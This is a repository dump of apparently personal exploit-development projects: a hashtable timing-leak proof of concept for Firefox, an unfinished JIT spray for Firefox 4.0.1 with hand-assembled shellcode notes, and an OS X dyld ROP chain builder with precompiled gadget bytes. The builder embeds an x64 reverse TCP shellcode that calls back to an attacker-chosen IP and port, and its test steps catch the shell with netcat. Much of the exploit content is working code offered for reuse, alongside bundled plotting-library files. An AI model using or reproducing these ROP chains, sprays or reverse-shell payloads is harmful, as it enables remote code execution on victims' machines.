i=m*Math.sin(Math.PI/3);l.moveTo(k-m/2,o+i/2);l.lineTo(k+m/2,o+i/2);if(!n){l.lineTo(k,o-i/2);l.lineTo(k-m/2,o+i/2)}},cross:function(k,j,n,i,m){var l=i*Math.sqrt(Math.PI)/2;k.moveTo(j-l,n-l);k.lineTo(j+l,n+l);k.moveTo(j-l,n+l);k.lineTo(j+l,n-l)}};var f=e.points.symbol;if(d[f]){e.points.symbol=d[f]}}function c(d){d.hooks.processDatapoints.push(a)}b.plot.plugins.push({init:c,name:"symbols",version:"1.0"})})(jQuery); -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.threshold.js: -------------------------------------------------------------------------------- 1 | /* 2 | Flot plugin for thresholding data. Controlled through the option 3 | "threshold" in either the global series options 4 | 5 | series: { 6 | threshold: { 7 | below: number 8 | color: colorspec 9 | } 10 | } 11 | 12 | or in a specific series 13 | 14 | $.plot($("#placeholder"), [{ data: [ ... ], threshold: { ... }}]) 15 | 16 | The data points below "below" are drawn with the specified color. This 17 | makes it easy to mark points below 0, e.g. for budget data. 18 | 19 | Internally, the plugin works by splitting the data into two series, 20 | above and below the threshold. The extra series below the threshold 21 | will have its label cleared and the special "originSeries" attribute 22 | set to the original series. You may need to check for this in hover 23 | events. 24 | */ 25 | 26 | (function ($) { 27 | var options = { 28 | series: { threshold: null } // or { below: number, color: color spec} 29 | }; 30 | 31 | function init(plot) { 32 | function thresholdData(plot, s, datapoints) { 33 | if (!s.threshold) 34 | return; 35 | 36 | var ps = datapoints.pointsize, i, x, y, p, prevp, 37 | thresholded = $.extend({}, s); // note: shallow copy 38 | 39 | thresholded.datapoints = { points: [], pointsize: ps }; 40 | thresholded.label = null; 41 | thresholded.color = s.threshold.color; 42 | thresholded.threshold = null; 43 | thresholded.originSeries = s; 44 | thresholded.data = []; 45 | 46 | var below = s.threshold.below, 47 | origpoints = datapoints.points, 48 | addCrossingPoints = s.lines.show; 49 | 50 | threspoints = []; 51 | newpoints = []; 52 | 53 | for (i = 0; i < origpoints.length; i += ps) { 54 | x = origpoints[i] 55 | y = origpoints[i + 1]; 56 | 57 | prevp = p; 58 | if (y < below) 59 | p = threspoints; 60 | else 61 | p = newpoints; 62 | 63 | if (addCrossingPoints && prevp != p && x != null 64 | && i > 0 && origpoints[i - ps] != null) { 65 | var interx = (x - origpoints[i - ps]) / (y - origpoints[i - ps + 1]) * (below - y) + x; 66 | prevp.push(interx); 67 | prevp.push(below); 68 | for (m = 2; m < ps; ++m) 69 | prevp.push(origpoints[i + m]); 70 | 71 | p.push(null); // start new segment 72 | p.push(null); 73 | for (m = 2; m < ps; ++m) 74 | p.push(origpoints[i + m]); 75 | p.push(interx); 76 | p.push(below); 77 | for (m = 2; m < ps; ++m) 78 | p.push(origpoints[i + m]); 79 | } 80 | 81 | p.push(x); 82 | p.push(y); 83 | } 84 | 85 | datapoints.points = newpoints; 86 | thresholded.datapoints.points = threspoints; 87 | 88 | if (thresholded.datapoints.points.length > 0) 89 | plot.getData().push(thresholded); 90 | 91 | // FIXME: there are probably some edge cases left in bars 92 | } 93 | 94 | plot.hooks.processDatapoints.push(thresholdData); 95 | } 96 | 97 | $.plot.plugins.push({ 98 | init: init, 99 | options: options, 100 | name: 'threshold', 101 | version: '1.0' 102 | }); 103 | })(jQuery); 104 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.threshold.min.js: -------------------------------------------------------------------------------- 1 | (function(B){var A={series:{threshold:null}};function C(D){function E(L,S,M){if(!S.threshold){return }var F=M.pointsize,I,O,N,G,K,H=B.extend({},S);H.datapoints={points:[],pointsize:F};H.label=null;H.color=S.threshold.color;H.threshold=null;H.originSeries=S;H.data=[];var P=S.threshold.below,Q=M.points,R=S.lines.show;threspoints=[];newpoints=[];for(I=0;I0&&Q[I-F]!=null){var J=(O-Q[I-F])/(N-Q[I-F+1])*(P-N)+O;K.push(J);K.push(P);for(m=2;m0){L.getData().push(H)}}D.hooks.processDatapoints.push(E)}B.plot.plugins.push({init:C,options:A,name:"threshold",version:"1.0"})})(jQuery); -------------------------------------------------------------------------------- /ff-hashleak/readme.txt: -------------------------------------------------------------------------------- 1 | This is a POC demonstrating how to leak information using timing attacks 2 | on hashtables. 3 | 4 | See gdtr.wordpress.com for details. 5 | 6 | p_k 7 | -------------------------------------------------------------------------------- /ff-hashleak/style.css: -------------------------------------------------------------------------------- 1 | * { 2 | font-family: Tahoma, Geneva, sans-serif; 3 | } 4 | .column0 { 5 | float:left; 6 | width: 75%; 7 | } 8 | .column1 { 9 | float:left; 10 | width: 49%; 11 | border: 1px dotted black; 12 | } 13 | .column2 { 14 | float:left; 15 | width: 12%; 16 | } 17 | 18 | .row { 19 | width: 100%; 20 | border: 1px dotted green; 21 | text-align:center; 22 | } 23 | div { 24 | } 25 | h1 { 26 | margin: 5px; 27 | } 28 | h2 { 29 | text-align:center; 30 | font-size: 18px; 31 | width: 100%; 32 | margin: 5px; 33 | } 34 | p { 35 | margin-left: 3px; 36 | margin-bottom: 1px; 37 | margin-top: 1px; 38 | } 39 | -------------------------------------------------------------------------------- /ff-hashleak/uint.js: -------------------------------------------------------------------------------- 1 | String.prototype.format = function() { 2 | var args = arguments; 3 | return this.replace(/{(\d+)}/g, function(match, number) { 4 | return typeof args[number] != 'undefined' 5 | ? args[number] 6 | : match 7 | ; 8 | }); 9 | }; 10 | function add(x, y){ 11 | var x = x>>>0; 12 | var y = y>>>0; 13 | return (x+y)>>>0; 14 | } 15 | function sub(x, y){ 16 | var x = x>>>0; 17 | var y = y>>>0; 18 | return (x-y)>>>0; 19 | } 20 | function div(x, y){ 21 | var x = x>>>0; 22 | var y = y>>>0; 23 | return (x/y)>>>0; 24 | } 25 | function mod(x, n){ 26 | var x = x>>>0; 27 | var n = n>>>0; 28 | var x = x%n; 29 | return x>>>0; 30 | } 31 | function shr(x, y){ 32 | if(y>=32){ 33 | return 0>>>0; 34 | } 35 | var a = x>>>0; 36 | var b = y>>>0; 37 | return (a>>>b)>>>0; 38 | } 39 | function shl(x, y){ 40 | if(y>=32){ 41 | return 0>>>0; 42 | } 43 | var x = x>>>0; 44 | var y = y>>>0; 45 | return (x<>>0; 46 | } 47 | function and(x, y){ 48 | var x = x>>>0; 49 | var y = y>>>0; 50 | return (x & y)>>>0; 51 | } 52 | function mul(a, b) { 53 | var ah = (a >> 16) & 0xffff, al = a & 0xffff; 54 | var bh = (b >> 16) & 0xffff, bl = b & 0xffff; 55 | var high = ((ah * bl) + (al * bh)) & 0xffff; 56 | var r = ((high << 16)>>>0) + (al * bl); 57 | return (r & (0xffffffff>>>0))>>>0; 58 | } 59 | 60 | function xgcd(a,b) 61 | { 62 | if (b == 0) 63 | {return [1, 0, a]} 64 | else 65 | { 66 | temp = xgcd(b, mod(a,b)) 67 | x = temp[0] 68 | y = temp[1] 69 | d = temp[2] 70 | return [y, sub(x,mul(y, div(a,b))), d] 71 | } 72 | } 73 | 74 | function inv(x, n){ 75 | var tmp = xgcd(x, n); 76 | var x = tmp[0]; 77 | x = mod(x, n); 78 | return x; 79 | } 80 | -------------------------------------------------------------------------------- /ff-hashleak/utils.js: -------------------------------------------------------------------------------- 1 | function fst(p) { return p[0]; }; 2 | function snd(p) { return p[1]; }; 3 | 4 | function sum(tab){ 5 | var s = _.reduce(tab, function (acc, x) { return acc+x;}, 0); 6 | return s; 7 | } 8 | function avg(tab){ 9 | var s = sum(tab); 10 | return s / _.size(tab); 11 | } 12 | function variance(tab){ 13 | var mi = avg(tab); 14 | var t = _.map(tab, function (x) { return (x-mi)*(x-mi); }); 15 | var v = avg(t); 16 | return v; 17 | } 18 | function std(tab){ 19 | var v = variance(tab); 20 | return Math.sqrt(v); 21 | } 22 | 23 | function mgcd(o){ 24 | if(!o.length) 25 | return 1; 26 | for(var r, a, i = o.length - 1, b = o[i]; i;) 27 | for(a = o[--i]; r = a % b; a = b, b = r); 28 | return Math.abs(b); 29 | } 30 | 31 | function ls_fit(xy_pairs) { 32 | var sum_x = 0; 33 | var sum_y = 0; 34 | var sum_xy = 0; 35 | var sum_xx = 0; 36 | var count = 0; 37 | 38 | var values_x = _.map(xy_pairs, fst); 39 | var values_y = _.map(xy_pairs, snd); 40 | /* 41 | * We'll use those variables for faster read/write access. 42 | */ 43 | var x = 0; 44 | var y = 0; 45 | var values_length = values_x.length; 46 | if (values_length != values_y.length) { 47 | throw new Error('The parameters values_x and values_y need to have same size!'); 48 | } 49 | 50 | /* 51 | * Nothing to do. 52 | */ 53 | if (values_length === 0) { 54 | throw new Error("No fit for empty set"); 55 | } 56 | 57 | /* 58 | * Calculate the sum for each of the parts necessary. 59 | */ 60 | for (var v = 0; v < values_length; v++) { 61 | x = values_x[v]; 62 | y = values_y[v]; 63 | sum_x += x; 64 | sum_y += y; 65 | sum_xx += x*x; 66 | sum_xy += x*y; 67 | count++; 68 | } 69 | 70 | /* 71 | * Calculate m and b for the formular: 72 | * y = x * m + b 73 | */ 74 | var m = (count*sum_xy - sum_x*sum_y) / (count*sum_xx - sum_x*sum_x); 75 | var b = (sum_y/count) - (m*sum_x)/count; 76 | return [m, b]; 77 | } 78 | 79 | function text_node(t){ 80 | var t = document.createTextNode(t); 81 | return t; 82 | } 83 | function wrap(t){ 84 | var p = document.createElement("P"); 85 | var t = text_node(t); 86 | p.appendChild(t); 87 | return p; 88 | } 89 | function dump_s(node, t){ 90 | var p = wrap(t); 91 | node.insertBefore(p, node.firstChild); 92 | } 93 | function dump(node, pair){ 94 | var i = pair[0]; 95 | var time = pair[1]; 96 | var t = i.toString(16) + "->" + time; 97 | dump_s(node, t); 98 | } 99 | 100 | function shuffle(arr) { 101 | var tmp, current, top = arr.length; 102 | 103 | if(top) while(--top) { 104 | current = Math.floor(Math.random() * (top + 1)); 105 | tmp = arr[current]; 106 | arr[current] = arr[top]; 107 | arr[top] = tmp; 108 | } 109 | 110 | return arr; 111 | } 112 | 113 | function rand(length,current){ 114 | current = current ? current : ''; 115 | return length ? rand( --length , "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz".charAt( Math.floor( Math.random() * 60 ) ) + current ) : current; 116 | } 117 | -------------------------------------------------------------------------------- /jit-ff-4.0.1/_how_to.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pakt/exp-dev/a9e8d4eec8001813a1f3f65b46d907db609fb323/jit-ff-4.0.1/_how_to.jpg -------------------------------------------------------------------------------- /jit-ff-4.0.1/jit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /jit-ff-4.0.1/readme.txt: -------------------------------------------------------------------------------- 1 | Unfinished JIT spray for FF 4.0.1, based on Chris Rohlf observations. 2 | -------------------------------------------------------------------------------- /jit-ff-4.0.1/shell0.txt: -------------------------------------------------------------------------------- 1 | 2 | jit marker: 3 | 4 | 14760052 89E1 MOV ECX,ESP 5 | 14760054 895C24 1C MOV DWORD PTR SS:[ESP+1C],EBX 6 | 14760058 C74424 18 70A1ED14 MOV DWORD PTR SS:[ESP+18],14EDA170 7 | 14760060 E8 0BDC5F51 CALL mozjs.65D5DC70 8 | 9 | 14760052 89E1 MOV ECX,ESP 10 | 14760054 895C24 1C MOV DWORD PTR SS:[ESP+1C],EBX 11 | 14760058 C74424 18 xxxxxxxx MOV DWORD PTR SS:[ESP+18], xxxxxxxx 12 | 14760060 E8 xxxxxxxx CALL mozjs.65D5DC70 ;rva = FDC70 13 | 0B950065 89C7 MOV EDI,EAX 14 | 15 | 89e1895c241cc7442418[0-9a-f]{8}e8[0-9a-f]{8}89c7 16 | 17 | CPU Dump 18 | Address Hex dump Command Comments 19 | 1BC1009B C747 04 0100FFFF MOV DWORD PTR DS:[EDI+4],FFFF0001 20 | 1BC100A2 C707 66554433 MOV DWORD PTR DS:[EDI],33445566 21 | 1BC100A8 89C7 MOV EDI,EAX 22 | 1BC100AA 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 23 | 1BC100AD C747 0C 0100FFFF MOV DWORD PTR DS:[EDI+0C],FFFF0001 24 | 1BC100B4 C747 08 66554433 MOV DWORD PTR DS:[EDI+8],33445566 25 | 1BC100BB 89C7 MOV EDI,EAX 26 | 1BC100BD 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 27 | 1BC100C0 C747 14 0100FFFF MOV DWORD PTR DS:[EDI+14],FFFF0001 28 | 1BC100C7 C747 10 66554433 MOV DWORD PTR DS:[EDI+10],33445566 29 | 1BC100CE 89C7 MOV EDI,EAX 30 | 1BC100D0 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 31 | 1BC100D3 C747 1C 0100FFFF MOV DWORD PTR DS:[EDI+1C],FFFF0001 32 | 1BC100DA C747 18 66554433 MOV DWORD PTR DS:[EDI+18],33445566 33 | 1BC100E1 89C7 MOV EDI,EAX 34 | 1BC100E3 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 35 | 1BC100E6 C747 24 0100FFFF MOV DWORD PTR DS:[EDI+24],FFFF0001 36 | 1BC100ED C747 20 66554433 MOV DWORD PTR DS:[EDI+20],33445566 37 | 1BC100F4 89C7 MOV EDI,EAX 38 | 1BC100F6 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 39 | 1BC100F9 C747 2C 0100FFFF MOV DWORD PTR DS:[EDI+2C],FFFF0001 40 | 1BC10100 C747 28 66554433 MOV DWORD PTR DS:[EDI+28],33445566 41 | 1BC10107 89C7 MOV EDI,EAX 42 | 1BC10109 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 43 | 1BC1010C C747 34 0100FFFF MOV DWORD PTR DS:[EDI+34],FFFF0001 44 | 1BC10113 C747 30 66554433 MOV DWORD PTR DS:[EDI+30],33445566 45 | 1BC1011A 89C7 MOV EDI,EAX 46 | 1BC1011C 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 47 | 1BC1011F C747 3C 0100FFFF MOV DWORD PTR DS:[EDI+3C],FFFF0001 48 | 1BC10126 C747 38 66554433 MOV DWORD PTR DS:[EDI+38],33445566 49 | 1BC1012D 89C7 MOV EDI,EAX 50 | 1BC1012F 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 51 | 1BC10132 C747 44 0100FFFF MOV DWORD PTR DS:[EDI+44],FFFF0001 52 | 1BC10139 C747 40 66554433 MOV DWORD PTR DS:[EDI+40],33445566 53 | 54 | 55 | 56 | CPU Dump 57 | Address Hex dump Command 58 | 1BC101C5 89C7 MOV EDI,EAX 59 | 1BC101C7 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 60 | 1BC101CA C787 84000000 0100FFFF MOV DWORD PTR DS:[EDI+84],FFFF0001 61 | 1BC101D4 C787 80000000 66554433 MOV DWORD PTR DS:[EDI+80],33445566 62 | 1BC101DE 89C7 MOV EDI,EAX 63 | 1BC101E0 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 64 | 1BC101E3 C787 8C000000 0100FFFF MOV DWORD PTR DS:[EDI+8C],FFFF0001 65 | 1BC101ED C787 88000000 66554433 MOV DWORD PTR DS:[EDI+88],33445566 66 | 1BC101F7 89C7 MOV EDI,EAX 67 | 1BC101F9 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 68 | 1BC101FC C787 94000000 0100FFFF MOV DWORD PTR DS:[EDI+94],FFFF0001 69 | 1BC10206 C787 90000000 66554433 MOV DWORD PTR DS:[EDI+90],33445566 70 | 1BC10210 89C7 MOV EDI,EAX 71 | 1BC10212 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 72 | 1BC10215 C787 9C000000 0100FFFF MOV DWORD PTR DS:[EDI+9C],FFFF0001 73 | 1BC1021F C787 98000000 66554433 MOV DWORD PTR DS:[EDI+98],33445566 74 | 1BC10229 89C7 MOV EDI,EAX 75 | 1BC1022B 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 76 | 1BC1022E C787 A4000000 0100FFFF MOV DWORD PTR DS:[EDI+0A4],FFFF0001 77 | 1BC10238 C787 A0000000 66554433 MOV DWORD PTR DS:[EDI+0A0],33445566 78 | 1BC10242 89C7 MOV EDI,EAX 79 | 1BC10244 8B7F 24 MOV EDI,DWORD PTR DS:[EDI+24] 80 | 1BC10247 C787 AC000000 0100FFFF MOV DWORD PTR DS:[EDI+0AC],FFFF0001 81 | 1BC10251 C787 A8000000 66554433 MOV DWORD PTR DS:[EDI+0A8],33445566 82 | 83 | 84 | ; e8 00 00 00 is a part of one of mov [edi+offset], XXX instructions 85 | 86 | e8 00 00 00 00 call $+5 ; last 00 is a controlled byte 87 | 5d pop ebp 88 | eb 15 jmp next_dword 89 | 90 | ; eb 15 jumps from end of one controlled dword to beginning of the next one 91 | 92 | 93 | 31 d2 xor edx, edx 94 | -- jmp 95 | 96 | b2 19 mov dl, 19h 97 | -- jmp 98 | 99 | 31 db xor ebx, ebx 100 | -- jmp 101 | 102 | b3 04 mov bl, 4 103 | -- jmp 104 | 105 | 31 c9 xor ecx, ecx 106 | -- jmp 107 | 108 | 89 ef mov edi, ebp 109 | -- jmp 110 | 111 | 29 df sub edi, ebx 112 | -- jmp 113 | 114 | 4f dec edi 115 | 90 nop 116 | -- jmp 117 | 118 | 31 c0 xor eax, eax 119 | -- jmp 120 | 121 | b0 15 mov al, 16h ;stage0 "size" in chunks 122 | -- jmp 123 | 124 | f2 e7 mul edx 125 | -- jmp 126 | 127 | 01 c7 add edi, eax 128 | -- jmp 129 | 130 | b2 19 mov dl, 19h ;mul cleared edx 131 | -- jmp 132 | 133 | ; patch offsets in mov [edi+offset], XXX instructions 134 | 135 | @@: 136 | 89 0f mov [edi], ecx 137 | -- jmp 138 | 139 | 01 d7 add edi, edx 140 | -- jmp 141 | 142 | 00 d9 add cl, bl 143 | 75 b3 jnz @b 144 | 145 | ; adjust edi, so that when copying is done, 146 | ; execution is passed directly to the shellcode (without using jumps) 147 | 148 | 01 df add edi, ebx 149 | -- jmp 150 | 151 | 01 df add edi, ebx ; edi = edi+8 152 | -- jmp 153 | 154 | 89 e8 mov eax, ebp 155 | -- jmp 156 | 157 | 89 78 24 mov dword ptr [eax+24], edi 158 | 90 nop 159 | 160 | 161 | 89c7 mov edi,eax 162 | 8b7f 24 mov edi,dword ptr ds:[edi+24] 163 | c787 84000000 0100ffff mov dword ptr ds:[edi+84],ffff0001 164 | c787 80000000 66554433 mov dword ptr ds:[edi+80],33445566 165 | 166 | 167 | -------------------------------------------------------------------------------- /osx.dyld.rop/README: -------------------------------------------------------------------------------- 1 | See sc.asm for explanation 2 | -------------------------------------------------------------------------------- /osx.dyld.rop/makefile: -------------------------------------------------------------------------------- 1 | all: sc.asm x64_shellcode.asm 2 | nasm x64_shellcode.asm 3 | nasm -fmacho64 sc.asm 4 | gcc sc.o -o sc 5 | 6 | clean: 7 | rm *.o sc x64_shellcode 8 | -------------------------------------------------------------------------------- /osx.dyld.rop/precompiled.txt: -------------------------------------------------------------------------------- 1 | \xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x08\x00\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00 2 | \x00\x00\x00\x00\x00\x00\x00\x00\xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00 3 | \x10\x00\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 4 | \xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x20\x00\xc5\x5f\xff\x7f\x00\x00 5 | \x73\x33\xc2\x5f\xff\x7f\x00\x00\x00\x10\xc5\x5f\xff\x7f\x00\x00\xe1\x4c\xc2\x5f\xff\x7f\x00\x00 6 | \xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x28\x00\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00 7 | \x00\x21\xc5\x5f\xff\x7f\x00\x00\xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00 8 | \x30\x00\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00\x00\x20\xc5\x5f\xff\x7f\x00\x00 9 | \xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x38\x00\xc5\x5f\xff\x7f\x00\x00 10 | \x73\x33\xc2\x5f\xff\x7f\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\xe1\x4c\xc2\x5f\xff\x7f\x00\x00 11 | \xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x58\x00\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00 12 | \x00\xf0\xc4\x5f\xff\x7f\x00\x00\xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00 13 | \x00\x20\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00\x56\xd3\xc0\x5f\xff\x7f\x00\x00 14 | \xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00\xc0\x20\xc5\x5f\xff\x7f\x00\x00 15 | \xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x00\x21\xc5\x5f\xff\x7f\x00\x00 16 | \x73\x33\xc2\x5f\xff\x7f\x00\x00\x00\x10\xc5\x5f\xff\x7f\x00\x00\xe1\x4c\xc2\x5f\xff\x7f\x00\x00 17 | \xdc\x4c\xc2\x5f\xff\x7f\x00\x00\xf8\x0f\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00 18 | \x49\x8d\xb7\xe0\x00\x00\x00\x48\xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00 19 | \x00\x10\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00\x31\xc9\x48\xff\xc1\x48\xc1\xe1 20 | \xe1\x4c\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x08\x10\xc5\x5f\xff\x7f\x00\x00 21 | \x73\x33\xc2\x5f\xff\x7f\x00\x00\x0c\x48\x8d\x3d\x02\x00\x00\x00\xe1\x4c\xc2\x5f\xff\x7f\x00\x00 22 | \xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x10\x10\xc5\x5f\xff\x7f\x00\x00\x73\x33\xc2\x5f\xff\x7f\x00\x00 23 | \xf3\xa4\xdc\x4c\xc2\x5f\xff\x7f\xe1\x4c\xc2\x5f\xff\x7f\x00\x00\x4b\x4c\xc2\x5f\xff\x7f\x00\x00 24 | \xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x00\x00\xc5\x5f\xff\x7f\x00\x00\xa1\x4c\xc2\x5f\xff\x7f\x00\x00 25 | -------------------------------------------------------------------------------- /osx.dyld.rop/sc.asm: -------------------------------------------------------------------------------- 1 | ; universal OSX dyld ROP shellcode 2 | ; tested on OS X 10.6.8 3 | ; 4 | ; if you don't want to compile, copy stage0 code from precompiled.txt 5 | ; and append your normal shellcode to it. 6 | ; 7 | ; usage: 8 | ; - put your 'normal' shellcode in x64_shellcode.asm 9 | ; - make 10 | ; - ./sc 11 | ; 12 | ; if you want to test: 13 | ; - uncomment lea rsp, [rel rop_stage0] / ret 14 | ; - make 15 | ; - nc -l 4444 16 | ; - ./sc 17 | ; - you should get a shell over nc 18 | ; 19 | ; see my blog, if you want to know how this works: 20 | ; http://gdtr.wordpress.com 21 | ; 22 | ; greets to Jacob Hammack, for his reverse tcp shellcode (hammackj.com). 23 | ; 24 | ; pa_kt 25 | ; twitter.com/pa_kt 26 | 27 | extern _printf 28 | 29 | global _main 30 | 31 | ;-------------------------------------------------- 32 | ;- DATA 33 | ;-------------------------------------------------- 34 | section .data 35 | 36 | rw_area equ 0x00007FFF5FC50000 37 | rwx_area equ rw_area+0x1000 38 | vm_prot equ 0x00007FFF5FC0D356 39 | fake_stack equ rw_area+0x2000 40 | fake_frame equ fake_stack+0x100 41 | r12_zero equ rw_area-0x1000 42 | 43 | rax_off equ rw_area-8 44 | rbx_off equ rw_area+8-8 45 | rcx_off equ rw_area+0x10-8 46 | rdx_off equ rw_area+0x18-8 47 | rsi_off equ rw_area+0x28-8 48 | rbp_off equ rw_area+0x30-8 49 | rsp_off equ rw_area+0x38-8 50 | r8_off equ rw_area+0x40-8 51 | r12_off equ rw_area+0x60-8 52 | 53 | pop_rdi equ 0x00007FFF5FC24CDC 54 | pop_rbx equ 0x00007FFF5FC23373 55 | store_reg equ 0x00007FFF5FC24CE1 56 | set_regs equ 0x00007FFF5FC24CA1 57 | 58 | c_rwx equ 7 59 | c_size equ 0x1000 60 | c_addr equ rwx_area 61 | c_set_max equ 0 62 | 63 | dbg_ret equ 0x00007FFF5FC24C4B 64 | 65 | ; copy shellcode to RWX area 66 | ; size = 0x1000 67 | stub: 68 | lea rsi, [r15+saved_rsp_off+copy_stub_size+rop_post_size] 69 | xor rcx, rcx 70 | inc rcx 71 | shl rcx, 12 ;rcx = 0x1000 72 | lea rdi, [rel normal_shellcode] 73 | rep movsb 74 | ;int 3 75 | normal_shellcode: 76 | 77 | stub_size equ $-stub 78 | 79 | ; order is important 80 | rop_pre dq pop_rdi, rcx_off, pop_rbx, c_set_max, store_reg, 81 | dq pop_rdi, rdx_off, pop_rbx, c_size, store_reg, 82 | dq pop_rdi, rsi_off, pop_rbx, c_addr, store_reg, 83 | dq pop_rdi, rbp_off, pop_rbx, fake_frame, store_reg, 84 | dq pop_rdi, rsp_off, pop_rbx, fake_stack, store_reg, 85 | dq pop_rdi, r8_off, pop_rbx, c_rwx, store_reg, 86 | dq pop_rdi, r12_off, pop_rbx, r12_zero, store_reg, 87 | 88 | ; set fake stack 89 | dq pop_rdi, fake_stack+8-8, pop_rbx, vm_prot, store_reg, 90 | 91 | ; set fake frame (return address -> rwx page) 92 | dq pop_rdi, fake_frame-8-0x38, store_reg, 93 | saved_rsp: 94 | dq pop_rdi, fake_frame+8-8, pop_rbx, rwx_area, store_reg, 95 | 96 | rop_pre_size equ $-rop_pre 97 | saved_rsp_off equ $-saved_rsp-8 98 | 99 | rop_post dq dbg_ret 100 | 101 | ; set all regs and jump to vm_prot 102 | dq pop_rdi, rw_area, set_regs 103 | ; marker 104 | ; dq 0x1111111111111111 105 | 106 | rop_post_size equ $-rop_post 107 | 108 | x64_shellcode: incbin "x64_shellcode" 109 | x64_shellcode_size equ $-x64_shellcode 110 | 111 | hello db "test", 0 112 | fmt db "\x%02x",0 113 | 114 | section .bss 115 | 116 | rop_stage0 resq 100 117 | copy_stub resq ((stub_size+7)/8)*5 118 | copy_stub_size equ $-copy_stub 119 | 120 | ;-------------------------------------------------- 121 | ;- CODE 122 | ;-------------------------------------------------- 123 | section .text 124 | 125 | prep_stub: 126 | 127 | mov rcx, (stub_size+7)/8 128 | mov rsi, stub 129 | mov rdi, copy_stub 130 | mov rbx, rwx_area-8 131 | go: 132 | mov rax, pop_rdi 133 | stosq 134 | mov rax, rbx 135 | stosq 136 | mov rax, pop_rbx 137 | stosq 138 | movsq 139 | mov rax, store_reg 140 | stosq 141 | add rbx, 8 142 | loop go 143 | ret 144 | 145 | make_stage0: 146 | mov rsi, rop_pre 147 | mov rdi, rop_stage0 148 | mov rcx, rop_pre_size 149 | rep movsb 150 | 151 | mov rsi, copy_stub 152 | mov rcx, copy_stub_size 153 | rep movsb 154 | 155 | mov rsi, rop_post 156 | mov rcx, rop_post_size 157 | rep movsb 158 | 159 | mov rsi, x64_shellcode 160 | mov rcx, x64_shellcode_size 161 | rep movsb 162 | 163 | ret 164 | 165 | print_it: 166 | push rbp 167 | mov rbp, rsp 168 | 169 | mov rcx, rop_pre_size + copy_stub_size + rop_post_size + x64_shellcode_size 170 | lea rsi, [rel rop_stage0] 171 | xor rax, rax 172 | one_char: 173 | lodsb 174 | push rsi 175 | push rcx 176 | mov rsi, rax 177 | mov rdi, qword fmt 178 | xor rax, rax 179 | call _printf 180 | pop rcx 181 | pop rsi 182 | loop one_char 183 | 184 | leave 185 | ret 186 | 187 | _main: 188 | push qword rbp 189 | mov rbp, rsp 190 | 191 | call prep_stub 192 | call make_stage0 193 | 194 | call print_it 195 | 196 | ;lea rsp, [rel rop_stage0] 197 | ;ret 198 | 199 | leave 200 | ret 201 | 202 | -------------------------------------------------------------------------------- /osx.dyld.rop/x64_shellcode.asm: -------------------------------------------------------------------------------- 1 | ;osx x64 reverse tcp shellcode (131 bytes) 2 | ;Jacob Hammack 3 | ;jacob.hammack@hammackj.com 8 | ;http://www.hammackj.com 9 | ; 10 | ;props to http://www.thexploit.com/ for the blog posts on x64 osx asm 11 | ;I borrowed some of his code 12 | ; 13 | 14 | ;#OSX reverse tcp shell (131 bytes) 15 | ;#replace FFFFFFFF around byte 43 with the call back ip in hex 16 | ;#replace 5C11 around byte 39 with a new port current is 4444 17 | ;shellcode = 18 | ;"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" + 19 | ;"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" + 20 | ;"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41" + 21 | 